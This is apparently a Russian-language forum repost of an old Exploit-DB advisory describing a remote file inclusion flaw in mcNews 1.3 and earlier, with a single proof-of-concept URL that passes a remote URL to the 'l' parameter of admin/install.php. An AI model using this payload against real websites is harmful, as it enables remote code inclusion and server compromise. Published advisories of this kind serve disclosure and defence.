Exploit McNews 1.x - 'install.php' Arbitrary File Inclusion

Exploiter

Хакер
34,599
0
18 Дек 2022
EDB-ID
25232
Проверка EDB
  1. Пройдено
Автор
JONATHAN WHITELEY
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
cve-2005-0800
Дата публикации
2005-03-17
Код:
source: https://www.securityfocus.com/bid/12835/info

mcNews is reportedly affected by a remote file include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input to the 'install.php' script.

This issue is reported to affect mcNews versions 1.3 and prior. 

http://www.example.com/path/to/mcnews/admin/install.php?l=http://www.example.com
 
Источник
www.exploit-db.com

Похожие темы